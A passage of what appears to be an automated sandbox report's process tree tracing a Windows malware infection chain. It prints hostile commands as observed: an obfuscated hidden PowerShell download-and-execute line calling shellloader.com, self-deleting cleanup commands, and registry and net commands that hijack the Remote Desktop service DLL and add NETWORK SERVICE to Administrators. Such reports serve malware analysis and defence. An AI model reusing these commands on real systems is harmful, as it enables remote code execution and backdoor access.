                                                                • C:\Users\Admin\AppData\Local\Temp\udptest.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\udptest.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:4612
                                                                • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                  "C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:4020
                                                                  • C:\Users\Admin\AppData\Local\Temp\is-UDHJP.tmp\setup_2.tmp
                                                                    "C:\Users\Admin\AppData\Local\Temp\is-UDHJP.tmp\setup_2.tmp" /SL5="$301FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"
                                                                    4⤵
                                                                    • Executes dropped EXE
                                                                    • Loads dropped DLL
                                                                    PID:2612
                                                                    • C:\Users\Admin\AppData\Local\Temp\setup_2.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                      5⤵
                                                                      • Executes dropped EXE
                                                                      PID:2272
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-U084N.tmp\setup_2.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-U084N.tmp\setup_2.tmp" /SL5="$20208,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT
                                                                        6⤵
                                                                          PID:5352
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-FJS9H.tmp\postback.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-FJS9H.tmp\postback.exe" ss1
                                                                            7⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of SetThreadContext
                                                                            PID:6132
                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                              explorer.exe ss1
                                                                              8⤵
                                                                                PID:5724
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  cmd.exe /c start /B powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                  9⤵
                                                                                    PID:5516
                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      powershell -windowstyle hidden -command "&{$t='#i#ex##@(n#ew#########-#ob#jec######t N#et#.W#####eb#Cl#ie#nt#).###Up#loa#dSt#######ri#####ng(#''h#t#tp#:###//shellloader.com/#w#el#co####me''#,###''S#e#ve#n#J#o###k##er''###)##|#ie##x'.replace('#','').split('@',5);&$t[0]$t[1]}"
                                                                                      10⤵
                                                                                      • Blocklisted process makes network request
                                                                                      PID:4404
                                                                                  • C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe"
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Loads dropped DLL
                                                                                    • Checks processor information in registry
                                                                                    PID:4244
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /c taskkill /im EtGb23GfX.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\EtGb23GfX.exe" & del C:\ProgramData\*.dll & exit
                                                                                      10⤵
                                                                                        PID:5040
                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                          taskkill /im EtGb23GfX.exe /f
                                                                                          11⤵
                                                                                          • Kills process with taskkill
                                                                                          PID:6224
                                                                                        • C:\Windows\SysWOW64\timeout.exe
                                                                                          timeout /t 6
                                                                                          11⤵
                                                                                          • Delays execution with timeout.exe
                                                                                          PID:5064
                                                                                    • C:\Users\Admin\AppData\Local\Temp\6OvxjtPJ9.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\6OvxjtPJ9.exe"
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:7656
                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                        10⤵
                                                                                        • Drops file in System32 directory
                                                                                        • Drops file in Windows directory
                                                                                        PID:7856
                                                                                        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pdis51nw\pdis51nw.cmdline"
                                                                                          11⤵
                                                                                            PID:8128
                                                                                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES84F0.tmp" "c:\Users\Admin\AppData\Local\Temp\pdis51nw\CSCFE3377FE34294FF6B88C449BB1BFDBC0.TMP"
                                                                                              12⤵
                                                                                                PID:6724
                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                              "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                              11⤵
                                                                                                PID:7264
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                11⤵
                                                                                                  PID:7008
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                  11⤵
                                                                                                    PID:7752
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                                    11⤵
                                                                                                      PID:7192
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                      11⤵
                                                                                                      • Modifies registry key
                                                                                                      PID:6076
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                      11⤵
                                                                                                        PID:8132
                                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                                        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                        11⤵
                                                                                                          PID:1376
                                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                                            C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                            12⤵
                                                                                                              PID:7840
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                            11⤵
                                                                                                              PID:4484
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                cmd /c net start rdpdr
                                                                                                                12⤵
                                                                                                                  PID:6268
                                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                                    net start rdpdr
                                                                                                                    13⤵
                                                                                                                      PID:6512
                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                        C:\Windows\system32\net1 start rdpdr
                                                                                                                        14⤵
                                                                                                                          PID:6596
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                                    11⤵
                                                                                                                      PID:7448
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c net start TermService
                                                                                                                        12⤵
                                                                                                                          PID:4876
                                                                                                                          • C:\Windows\SysWOW64\net.exe
                                                                                                                            net start TermService
                                                                                                                            13⤵
                                                                                                                              PID:7436
                                                                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                                                                C:\Windows\system32\net1 start TermService
                                                                                                                                14⤵
                                                                                                                                  PID:7084
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9T0OnGIGy.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\9T0OnGIGy.exe"
                                                                                                                        9⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:8156
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
                                                                                                                          10⤵
                                                                                                                          • Drops file in Windows directory
                                                                                                                          PID:8188
                                                                                                                          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yglm3hcs\yglm3hcs.cmdline"
                                                                                                                            11⤵
                                                                                                                              PID:2304
                                                                                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES486F.tmp" "c:\Users\Admin\AppData\Local\Temp\yglm3hcs\CSC6188B91267ED457FACD8164C64C2484.TMP"
                                                                                                                                12⤵
                                                                                                                                  PID:6188
                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                11⤵
                                                                                                                                  PID:7500
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                  11⤵
                                                                                                                                    PID:5880
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
                                                                                                                                    11⤵
                                                                                                                                      PID:7216
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        12⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:5368
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
                                                                                                                                      11⤵
                                                                                                                                        PID:6488
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
                                                                                                                                        11⤵
                                                                                                                                        • Modifies registry key
                                                                                                                                        PID:1496
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
                                                                                                                                        11⤵
                                                                                                                                          PID:7760
                                                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                                                          "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                          11⤵
                                                                                                                                            PID:3924
                                                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                                                              C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                                                                                                                                              12⤵
                                                                                                                                                PID:7484
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                                                                                                                                              11⤵
                                                                                                                                                PID:212
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  cmd /c net start rdpdr
                                                                                                                                                  12⤵
                                                                                                                                                    PID:6696
                                                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                                                      net start rdpdr
                                                                                                                                                      13⤵
                                                                                                                                                        PID:3980
                                                                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                          C:\Windows\system32\net1 start rdpdr
                                                                                                                                                          14⤵
                                                                                                                                                            PID:584
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                                                                                                                                                      11⤵
                                                                                                                                                        PID:1780
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          cmd /c net start TermService
                                                                                                                                                          12⤵
                                                                                                                                                            PID:7272
                                                                                                                                                            • C:\Windows\SysWOW64\net.exe
                                                                                                                                                              net start TermService
                                                                                                                                                              13⤵
                                                                                                                                                                PID:6680
                                                                                                                                                                • C:\Windows\SysWOW64\net1.exe
                                                                                                                                                                  C:\Windows\system32\net1 start TermService
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:7072
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\3002.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:2360
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\3002.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\3002.exe" -a
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5816
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              PID:1312
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:3824
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe
                                                                                                                                          Sat19e6a852f849bb2.exe
                                                                                                                                          1⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Checks processor information in registry
                                                                                                                                          PID:4544
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                            2⤵
                                                                                                                                              PID:5260
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im Sat19e6a852f849bb2.exe /f
                                                                                                                                                3⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:4660
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 6
                                                                                                                                                3⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:6436
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe
                                                                                                                                            Sat19ba05e89ea6d406.exe
                                                                                                                                            1⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1488
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp
                                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-24343.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$301E8,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSC83008B3\Sat19ba05e89ea6d406.exe"
                                                                                                                                              2⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              PID:3592
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-R01AG.tmp\46807GHF____.exe" /S /UID=burnerch2
                                                                                                                                                3⤵
                                                                                                                                                • Drops file in Drivers directory
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Adds Run key to start application
                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                PID:2480
                                                                                                                                                • C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe
                                                                                                                                                  "C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:3720
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-EO9SV.tmp\ultramediaburner.tmp" /SL5="$302CE,281924,62464,C:\Program Files\Java\SPLXFNRHQQ\ultramediaburner.exe" /VERYSILENT
                                                                                                                                                    5⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                    PID:4956
                                                                                                                                                    • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                                                                                      "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                                                                                      6⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5652
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\60-a6f67-ece-0febc-549e9c64ccfa7\Qelaecejuca.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\60-a6f67-ece-0febc-549e9c64ccfa7\Qelaecejuca.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Checks computer location settings
                                                                                                                                                  PID:5640
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\eb-f287e-293-8ee97-a656dd53ac63e\Fokifyfulo.exe
                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\eb-f287e-293-8ee97-a656dd53ac63e\Fokifyfulo.exe"
                                                                                                                                                  4⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  PID:5104
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe /eufive & exit
                                                                                                                                                    5⤵
                                                                                                                                                      PID:6428
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\coro104b.gxq\GcleanerEU.exe /eufive
                                                                                                                                                        6⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:6768
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                      5⤵
                                                                                                                                                        PID:6652
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                                                                                          PID:7108
                                                                                                                                                          • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\zlwpa1ah.00r\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133683 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                            7⤵
                                                                                                                                                              PID:7192
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe & exit
                                                                                                                                                          5⤵
                                                                                                                                                            PID:6964
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\oxrgytmr.42q\anyname.exe
                                                                                                                                                              6⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:6164
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe /mixfive & exit
                                                                                                                                                            5⤵
                                                                                                                                                              PID:4872
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\vmguzdvf.xe4\gcleaner.exe /mixfive
                                                                                                                                                                6⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:3176
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\01xlnkab.lgt\autosubplayer.exe /S & exit
                                                                                                                                                              5⤵
                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                              PID:2340
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      PID:4404
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:2052
                                                                                                                                                    • C:\Windows\system32\rundll32.exe
                                                                                                                                                      rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                      1⤵
                                                                                                                                                      • Process spawned unexpected child process
                                                                                                                                                      PID:3024
                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                        2⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:5148
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                      1⤵
                                                                                                                                                      • Drops file in Windows directory
                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                      • Modifies registry class
                                                                                                                                                      • Suspicious use of SetWindowsHookEx
                                                                                                                                                      PID:6260
                                                                                                                                                    • C:\Windows\system32\browser_broker.exe
                                                                                                                                                      C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                      1⤵
                                                                                                                                                      • Modifies Internet Explorer settings
                                                                                                                                                      PID:6356
                                                                                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                      1⤵
                                                                                                                                                        PID:6760
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                        1⤵
                                                                                                                                                        • Suspicious behavior: MapViewOfSection
                                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                                        PID:6932
                                                                                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                                                                                        C:\Windows\system32\msiexec.exe /V
                                                                                                                                                        1⤵
                                                                                                                                                        • Enumerates connected drives
                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                        PID:5940
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 5E4B7F2EA7580098D20D75BE98F8B7B9 C
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:6904
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding E6E769788A719934642CB1D495629EE2
                                                                                                                                                          2⤵
                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:7200
                                                                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                            "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                                                                                                                                                            3⤵
                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                            PID:6940
                                                                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 7F990FF4B9B189A13ECA71060C43E29E E Global\MSI0000
                                                                                                                                                          2⤵
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:3472
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                        1⤵
                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                        • Modifies Internet Explorer settings
                                                                                                                                                        • Modifies registry class
                                                                                                                                                        PID:6424
                                                                                                                                                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                        1⤵
                                                                                                                                                          PID:2304
                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                          1⤵
                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                          PID:5092
                                                                                                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                            2⤵
                                                                                                                                                              PID:4036
                                                                                                                                                          • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                                            C:\Windows\system32\wbem\wmiprvse.exe -Embedding
                                                                                                                                                            1⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            PID:7260
                                                                                                                                                          • C:\Windows\System32\SLUI.exe
                                                                                                                                                            "C:\Windows\System32\SLUI.exe" RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=2de67392-b7a7-462a-b1ca-108dd189f588;NotificationInterval=1440;Trigger=TimerEvent
                                                                                                                                                            1⤵
                                                                                                                                                              PID:7696
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
                                                                                                                                                              "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe" /update
                                                                                                                                                              1⤵
                                                                                                                                                                PID:6664
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\OneDrive\StandaloneUpdater\OneDriveSetup.exe
